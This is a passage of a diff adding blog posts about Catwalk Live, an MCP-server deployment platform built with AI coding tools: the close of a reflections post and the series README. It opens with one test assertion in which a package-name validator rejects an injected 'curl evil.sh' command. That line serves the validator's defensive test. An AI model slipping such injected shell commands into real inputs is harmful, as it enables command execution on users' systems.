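assert not is_valid_npm_name("package && curl evil.sh")   # so are shell metacharacters
```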
+
+### What Didn't Work: The Failure Modes
+
+#### 1. AI Doesn't Think About Security
+
+AI-generated code often has security holes:
+
+- ❌ Command injection (user input → shell execution)
+- ❌ Secrets in logs (`logger.info(deployment.dict())` logged credentials)
+- ❌ CORS misconfiguration (`allow_origins=["*"]`)
+- ❌ Missing access control on MCP endpoints
+
+**Why**: AI is trained to make code **work**, not to make code **secure**.
+
+**Solution**: Always run security-focused reviews. Use tools like CodeRabbit. Never trust AI with security-critical code.
+
+#### 2. AI Struggles with Infrastructure Quirks
+
+AI knows general patterns but fails at platform-specific details:
+
+**Example: Fly.io private networking**
+
+AI suggested:
+```python
+machine_url = f"http://{machine_id}.fly.dev/mcp"
+```
+
+**Problem**: `.fly.dev` is public DNS. MCP machines don't have public IPs.
+
+**Correct**:
+```python
+machine_url = f"http://{machine_id}.vm.mcp-host.internal:8080/mcp"
+```
+
+**Why AI failed**: Fly.io's `.internal` DNS is specific to Fly's private network. Not common knowledge in training data.
+
+**Solution**: Deep knowledge of infrastructure platforms still requires human expertise.
+
+#### 3. AI Generates Incomplete Implementations
+
+**Example: Authentication**
+
+AI generated:
+```typescript
+async signIn({ user, account }) {
+  // TODO: Sync user to backend database
+  return true
+}
+```
+
+**I shipped this.** Users could sign in, but backend had no record of them → 401 errors everywhere.
+
+**Why**: AI knows authentication **patterns** but doesn't know **your specific architecture**.
+
+**Solution**: Always verify TODOs are resolved. Never ship commented-out functionality.
+
+#### 4. AI Can't Debug Across Systems
+
+**The 401 authentication nightmare** (Part 7):
+- Frontend generates JWT with `AUTH_SECRET`
+- Backend verifies JWT with different `AUTH_SECRET`
+- Error: "Invalid signature"
+
+**AI's suggestion**: "Check if secrets match"
+
+**Helpful, but not actionable.** AI can't:
+- Check Fly.io secrets
+- Compare `.env.local` with remote secrets
+- Trace requests through multiple systems
+
+**Human debugging required**:
+1. Manually verify secrets match
+2. Test each component separately
+3. Create troubleshooting documentation
+4. Fix the root cause (secret sync)
+
+**The insight**: AI debugs single-system issues well. Multi-system integration failures need human investigation.
+
+## The Skill Shift
+
+Building Catwalk Live changed how I think about software development.
+
+### Old Model: Writing Code
+
+**Traditional developer**:
+1. Understand requirements
+2. Design architecture
+3. **Write code line by line**
+4. Debug and test
+5. Deploy
+
+**Bottleneck**: Step 3 (writing code). Slow, error-prone, tedious.
+
+### New Model: Orchestrating AI
+
+**AI-assisted developer**:
+1. Understand requirements
+2. Design architecture
+3. **Craft detailed prompts**
+4. **Validate AI-generated code**
+5. **Orchestrate multiple AI agents**
+6. Debug (with AI assistance)
+7. Deploy
+
+**Bottleneck shift**: From writing code → validating systems.
+
+**Key skills now**:
+- ✅ **Architectural thinking**: What should be built, why, and how?
+- ✅ **Prompt engineering**: How to specify requirements precisely?
+- ✅ **System validation**: Is this code safe? Does it handle edge cases?
+- ✅ **Integration debugging**: Why are these systems not talking to each other?
+- ✅ **Quality control**: Does this meet production standards?
+
+**Skills becoming less critical**:
+- ⬇️ Syntax memorization (AI knows all frameworks)
+- ⬇️ Boilerplate generation (AI excels at this)
+- ⬇️ CRUD implementation (AI generates correctly)
+- ⬇️ API client code (AI reads OpenAPI specs)
+
+### The Role Evolution
+
+**I'm not a traditional coder anymore.** I'm a:
+
+- **System Architect**: Designing how components fit together
+- **Quality Engineer**: Validating AI output meets production standards
+- **Prompt Engineer**: Specifying requirements with precision
+- **Integration Specialist**: Debugging cross-system failures
+- **AI Orchestrator**: Coordinating multiple AI agents to build systems
+
+**Analogy**: From construction worker (building brick by brick) → construction manager (coordinating teams to build the structure).
+
+## Lessons for Future AI-Assisted Projects
+
+Based on 12 days and 86 commits, here's what I'd do again (and what I'd change):
+
+### Do Again ✅
+
+1. **Start with context files** (`AGENTS.md`, `ARCHITECTURE.md`, `CURRENT_STATUS.md`)
+ - Write these BEFORE any code
+ - Update them religiously
+ - Treat as single source of truth
+
+2. **Multi-AI validation**
+ - Cross-check architecture decisions across GPT-4, Claude, Gemini
+ - Where consensus → proceed confidently
+ - Where disagreement → investigate deeply
+
+3. **Automated review agents**
+ - Add CodeRabbit, Qodo to every PR
+ - Feed their comments back to implementing AI
+ - Create iterative improvement loop
+
+4. **Detailed prompts with constraints**
+ - Specify tech stack versions
+ - List security requirements explicitly
+ - Define success criteria
+ - Include example code patterns
+
+5. **Incremental validation**
+ - Deploy early and often
+ - Test each component as it's built
+ - Don't wait until "everything is ready"
+
+### Do Differently ❌
+
+1. **Write tests FIRST**
+ - I waited until day 10 to write tests
+ - This was a mistake
+ - Test-driven development works with AI too
+
+2. **Smaller, more frequent commits**
+ - Some commits changed 20+ files
+ - Made debugging harder
+ - One feature per commit is better
+
+3. **Security review at every stage**
+ - I only ran security review at the end
+ - Found critical issues late
+ - Should have reviewed after each feature
+
+4. **Database design upfront**
+ - Changed schema 3 times
+ - Migrations became messy
+ - Spend more time designing schema before coding
+
+5. **Document infrastructure decisions immediately**
+ - Spent hours re-learning Fly.io private networking
+ - Should have documented the first time
+ - "Future me" would thank "past me"
+
+## The Honest Assessment
+
+**Can AI build production systems without human coding?**
+
+**Answer: Yes, but...**
+
+### What AI Can Do (Proven)
+
+✅ Generate boilerplate (FastAPI routes, React components)
+✅ Implement known patterns (CRUD, authentication, validation)
+✅ Write database models and migrations
+✅ Create API clients from OpenAPI specs
+✅ Generate comprehensive test suites
+✅ Follow specific architectural constraints
+✅ Refactor code to improve readability
+
+### What AI Cannot Do (Yet)
+
+❌ Architectural decision-making (monolith vs microservices?)
+❌ Security threat modeling (what could attackers exploit?)
+❌ Infrastructure platform expertise (Fly.io quirks, AWS specifics)
+❌ Business requirement interpretation (what does the user actually need?)
+❌ Edge case discovery (what scenarios did we not think of?)
+❌ Cross-system debugging (why is auth failing between frontend and backend?)
+❌ Production trade-off evaluation (performance vs cost vs complexity?)
+
+### What Humans Must Still Do
+
+🧠 **System Architecture**: Design how components interact
+🧠 **Security Validation**: Ensure code doesn't enable attacks
+🧠 **Infrastructure Knowledge**: Understand platform-specific behavior
+🧠 **Integration Debugging**: Solve multi-system failures
+🧠 **Quality Assurance**: Validate code meets production standards
+🧠 **Product Decisions**: Prioritize features, manage scope
+
+**The insight**: AI is a powerful **amplifier** of developer productivity, not a **replacement** for developer judgment.
+
+## The Future: Where This Goes
+
+This project proved AI-orchestrated development can build production systems. But we're still early.
+
+### Near Future (1-2 years)
+
+**Expectation**: AI coding assistants become standard in every developer workflow.
+
+**Changes**:
+- IDEs integrate AI deeply (already happening: Cursor, Continue)
+- AI agents handle full features (not just code snippets)
+- Multi-agent systems become common (planning AI + implementation AI + review AI)
+- Context management becomes critical skill
+
+**Developer role shift**: Less "writing code" → more "validating systems"
+
+### Medium Future (3-5 years)
+
+**Expectation**: AI can build entire MVPs from specifications.
+
+**Requirements**:
+- Better architectural reasoning (AI makes design decisions)
+- Improved security awareness (AI proactively hardens code)
+- Infrastructure knowledge (AI understands platform specifics)
+- Self-testing capability (AI writes comprehensive tests automatically)
+
+**Developer role shift**: Focus on **what to build** (product) rather than **how to build it** (implementation).
+
+### Long Future (5-10 years)
+
+**Speculation**: AI builds complex systems with minimal human intervention.
+
+**Open questions**:
+- Can AI learn infrastructure quirks from documentation?
+- Can AI reason about security threats like humans?
+- Can AI debug emergent failures in distributed systems?
+- Can AI make architectural trade-offs (cost vs performance vs complexity)?
+
+**My intuition**: AI will get very good at **implementation** but humans will remain critical for **judgment calls**.
+
+## The Meta-Lesson
+
+This project was as much about **AI-orchestrated development methodology** as it was about building a deployment platform.
+
+**The real deliverable**: A reproducible process for building production systems with AI.
+
+**The methodology**:
+1. Refine prompts to extreme specificity
+2. Cross-validate architecture with multiple AI models
+3. Create structured context files for consistency
+4. Implement with AI (Claude Code, Cursor)
+5. Review with automated AI agents (CodeRabbit, Qodo)
+6. Debug integration issues (human expertise required)
+7. Iterate based on feedback
+8. Ship to production
+
+**Why this matters**: Software development is entering a new era. Developers who learn to **orchestrate AI effectively** will have a massive productivity advantage.
+
+**This blog series is the playbook.**
+
+## Where Catwalk Live Goes Next
+
+**Current state**: Production-ready platform with known gaps.
+
+**What works**:
+- End-to-end MCP deployment
+- Streamable HTTP proxying
+- Credential encryption
+- Package validation
+- User authentication
+- Production infrastructure
+
+**What's next (Phase 8+)**:
+- Health monitoring loop (proactive failure detection)
+- Deployment logs and metrics
+- Cost tracking per deployment
+- Vercel Functions as Fly.io alternative (edge deployment)
+- Scale-to-zero for cost optimization
+- Public MCP registry (discover and deploy)
+
+**Long-term vision**: Make MCP server deployment as simple as `git push`.
+
+## Final Thoughts
+
+December 27, 2025. Looking back at 12 days:
+
+**What surprised me**:
+- How well multi-AI validation worked
+- How bad AI is at security
+- How critical context files became
+- How much human judgment still matters
+
+**What I'm proud of**:
+- Shipping a working production system
+- Documenting the methodology completely
+- Proving AI orchestration can build real products
+- Creating a reproducible process
+
+**What I learned**:
+- AI is a tool, not magic
+- Prompt engineering is a critical skill
+- Quality gates prevent bad AI code from shipping
+- Humans make architectural and security decisions
+- The skill is shifting from "coding" to "validating systems"
+
+**The conclusion**: AI-orchestrated development **works** - but only when humans provide structure, validation, and judgment.
+
+**This is the future of software development.** And it's already here.
+
+---
+
+## Resources
+
+**This Project**:
+- [GitHub Repository](https://github.com/zenchantlive/catwalk)
+- [AI_ORCHESTRATION.md](../AI_ORCHESTRATION.md) - Complete methodology
+- [AGENTS.md](../AGENTS.md) - AI agent specifications
+- [context/](../context/) - Full knowledge base
+
+**AI Tools Used**:
+- Claude Code (Anthropic) - Primary implementation
+- Cursor - Refactoring
+- Google Gemini - Planning and validation
+- ChatGPT (GPT-4) - Cross-validation
+- CodeRabbit - Security review
+- Qodo - Edge case detection
+
+**Connect**:
+- Email: jordanlive121@gmail.com
+- Twitter: [@zenchantlive](https://twitter.com/zenchantlive)
+- LinkedIn: [Jordan Hindo](https://linkedin.com/in/jordan-hindo)
+
+---
+
+**Thank you for reading this series.** I hope it inspires you to experiment with AI-orchestrated development.
+
+**The future is being built by developers who learned to orchestrate AI. Will you be one of them?**
+
+---
+
+**Series Complete**: [Return to Overview](README.md)
+
+**Previous Post**: [Part 8: Security Hardening & Production Ready](08-security-hardening-production.md)
+
+**Share your experience**: If you build something using this methodology, I'd love to hear about it!
diff --git a/blog/README.md b/blog/README.md
new file mode 100644
index 0000000..255e1b3
--- /dev/null
+++ b/blog/README.md
@@ -0,0 +1,178 @@
+# Catwalk Live: Development Journey
+
+A blog series documenting the development of **Catwalk Live** - a Vercel-like platform for deploying Remote MCP servers to Fly.io - built entirely through AI orchestration in just 12 days.
+
+## About the Project
+
+**What**: Catwalk Live makes deploying Model Context Protocol (MCP) servers as simple as deploying to Vercel. Paste a GitHub repo URL, enter credentials, and get a production-ready MCP endpoint that Claude Desktop can immediately connect to.
+
+**Stack**:
+- Frontend: Next.js 15 (App Router), React 19, TailwindCSS 4, TypeScript 5+
+- Backend: FastAPI (Python 3.12), SQLAlchemy (async), PostgreSQL 15+
+- Infrastructure: Fly.io (Machines API), Docker
+- Development: Claude Code, Cursor, Google Gemini (multi-AI orchestration)
+
+**Timeline**: December 11-23, 2025 (12 days, 86 commits)
+
+**Context**: This project was built without manually writing code - instead using strategic AI orchestration, multi-agent coordination, and rigorous quality control. It demonstrates that AI can build production-ready systems when given proper structure, constraints, and validation.
+
+## Series Overview
+
+This series doesn't just document a technical project - it documents a **methodology**. Each post reveals how AI coding assistants can be orchestrated to build complex, production-ready systems, and where human expertise remains critical.
+
+You'll learn:
+- ✅ How to architect systems with AI assistance
+- ✅ Prompt engineering patterns that produce production-quality code
+- ✅ Multi-AI validation techniques
+- ✅ Real debugging challenges (and solutions)
+- ✅ Where AI excels and where it struggles
+- ✅ Context engineering for multi-session consistency
+
+## Posts
+
+### Part 1: [Genesis - Building a Vercel for MCP Servers](01-genesis-building-vercel-for-mcp.md)
+**Dec 11, 2025** • *The spark of an idea and the first commit*
+
+The beginning: Why build this? What problem does it solve? How do you start a complex full-stack project with AI assistance? This post covers the initial vision, tech stack decisions, and the critical choice to build with AI orchestration rather than traditional coding.
+
+**Key Topics**: Project vision, AI orchestration methodology, initial architecture, tech stack rationale
+
+### Part 2: [Foundation - Architecture & Encryption](02-foundation-architecture-encryption.md)
+**Dec 11, 2025** • *Building the core architecture and security model*
+
+Diving deep into the foundational architecture: three-layer system design, Fernet encryption for credentials, dynamic form generation from AI analysis, and the Aurora UI design system. This is where the project's architectural DNA was established.
+
+**Key Topics**: System architecture, credential encryption, database schema, dynamic forms, Aurora design system
+
+### Part 3: [The AI Analysis Engine](03-ai-analysis-engine.md)
+**Dec 11-12, 2025** • *Teaching Claude to analyze MCP repositories*
+
+How do you get an AI to analyze another developer's GitHub repository and extract deployment configuration? This post reveals the prompt engineering, caching strategy, and lessons learned from integrating Claude API with web search plugins.
+
+**Key Topics**: Prompt engineering, Claude API integration, web search plugins, caching, regex extraction
+
+### Part 4: [First Deployment - Fly.io Adventures](04-first-deployment-flyio.md)
+**Dec 12-14, 2025** • *From localhost to production*
+
+The reality of deploying to production: PostgreSQL driver nightmares (asyncpg vs psycopg3), Docker CRLF line ending bugs, missing dependencies, and database cluster failures. This post chronicles the hard-won lessons from getting the backend live on Fly.io.
+
+**Key Topics**: Dockerization, PostgreSQL drivers, Fly.io deployment, database debugging, infrastructure lessons
+
+### Part 5: [Implementing Streamable HTTP & MCP Machines](05-streamable-http-mcp-machines.md)
+**Dec 14, 2025** • *The technical heart of the platform*
+
+Building the core MCP functionality: implementing the MCP 2025-06-18 Streamable HTTP spec, integrating Fly Machines API, designing the mcp-proxy architecture, and solving Fly.io private networking challenges. This is where the platform truly came alive.
+
+**Key Topics**: MCP protocol, Streamable HTTP, Fly Machines API, mcp-proxy, private networking, protocol version negotiation
+
+### Part 6: [Building the Registry & Validation Layer](06-registry-validation.md)
+**Dec 16-19, 2025** • *Security through validation*
+
+Making the platform secure and reliable: package validation against npm/PyPI registries, credential validation, Glama registry integration, and addressing CodeRabbit's security review feedback. Security isn't an afterthought - it's a continuous practice.
+
+**Key Topics**: Package validation, npm/PyPI registry checks, credential validation, security review, command injection prevention
+
+### Part 7: [The Authentication Nightmare](07-authentication-crisis.md)
+**Dec 20-21, 2025** • *When everything breaks at once*
+
+The darkest moment: implementing JWT authentication seemed straightforward until mysterious 401 errors blocked everything. This post documents the debugging saga that revealed the subtle difference between AUTH_SECRET and AUTH_SYNC_SECRET, and why user sync was silently failing.
+
+**Key Topics**: JWT authentication, debugging 401 errors, NextAuth.js integration, user synchronization, auth troubleshooting methodology
+
+### Part 8: [Security Hardening & Production Ready](08-security-hardening-production.md)
+**Dec 21-23, 2025** • *From working to production-ready*
+
+The final sprint: comprehensive test suite (51 tests), security hardening from PR reviews, access token rotation, cache improvements, Vercel deployment fixes, and addressing every piece of automated feedback from CodeRabbit, Qodo, and Gemini Code Assist.
+
+**Key Topics**: Integration testing, security hardening, test coverage, automated PR reviews, production deployment, Vercel configuration
+
+### Part 9: [Reflections - AI-Orchestrated Development](09-reflections-ai-orchestration.md)
+**Dec 23, 2025 - Present** • *Lessons learned and the future*
+
+Looking back on 12 intense days: What worked? What didn't? Where did AI excel? Where did it fail? How has AI-assisted development changed the role of the engineer? This post synthesizes the entire journey into transferable lessons and future directions.
+
+**Key Topics**: AI orchestration lessons, context engineering, multi-agent validation, prompt refinement, where AI struggles, the future of development
+
+---
+
+## Reading Paths
+
+### Quick Read (Core Story)
+For the essential narrative in ~30 minutes:
+→ Posts 1, 3, 7, 9
+
+### Technical Deep-Dive (Full Journey)
+For engineers who want all the details:
+→ All posts in order (1-9)
+
+### Specific Topics
+
+**AI & Prompt Engineering**: Posts 1, 3, 9
+**Infrastructure & DevOps**: Posts 4, 5, 8
+**Security & Authentication**: Posts 2, 6, 7, 8
+**System Architecture**: Posts 2, 5, 6
+**MCP Protocol**: Posts 3, 5
+**Debugging War Stories**: Posts 4, 7
+
+---
+
+## Context & Documentation
+
+This blog series complements the project's extensive documentation:
+
+- **[AI_ORCHESTRATION.md](../AI_ORCHESTRATION.md)** - Complete AI methodology case study
+- **[AGENTS.md](../AGENTS.md)** - AI agent specifications & interaction protocols
+- **[context/](../context/)** - Knowledge base used to guide AI development
+- **[CURRENT_STATUS.md](../context/CURRENT_STATUS.md)** - Detailed project status and lessons learned
+- **[ARCHITECTURE.md](../context/ARCHITECTURE.md)** - Technical architecture deep-dive
+
+---
+
+## Why This Series Matters
+
+This isn't just another "I built X with AI" post. This is a **reproducible methodology** documented in real-time across an actual production system.
+
+**You'll see**:
+- The actual prompts that produced production code
+- The mistakes AI made (and how to catch them)
+- The architectural decisions that AI can't make
+- The debugging process when AI-generated code fails
+- The quality gates that prevent bad AI code from shipping
+
+**You'll learn**:
+- How to structure context for AI consistency across sessions
+- Multi-AI validation patterns
+- When to trust AI output and when to validate carefully
+- How to orchestrate AI agents for complex projects
+- The skill shift from "writing code" to "validating systems"
+
+---
+
+## The Result
+
+After 12 days and 86 commits:
+
+- ✅ Full-stack platform deployed to production
+- ✅ Working end-to-end MCP tool calling
+- ✅ 51 automated tests passing
+- ✅ Security hardened through multi-agent review
+- ✅ ~3,400 lines of production-quality code
+- ✅ Complete methodology documented
+
+**Live**: [GitHub Repository](https://github.com/zenchantlive/catwalk)
+
+---
+
+## Start Reading
+
+**New to this project?** Start with [Part 1: Genesis](01-genesis-building-vercel-for-mcp.md)
+
+**Want the technical heart?** Jump to [Part 5: Streamable HTTP](05-streamable-http-mcp-machines.md)
+
+**Interested in AI methodology?** Read [Part 9: Reflections](09-reflections-ai-orchestration.md)
+
+---
+
+**Questions? Feedback?** Open an issue on [GitHub](https://github.com/zenchantlive/catwalk/issues)
+
+**Want to build your own AI-orchestrated project?** This series is your guide. 🚀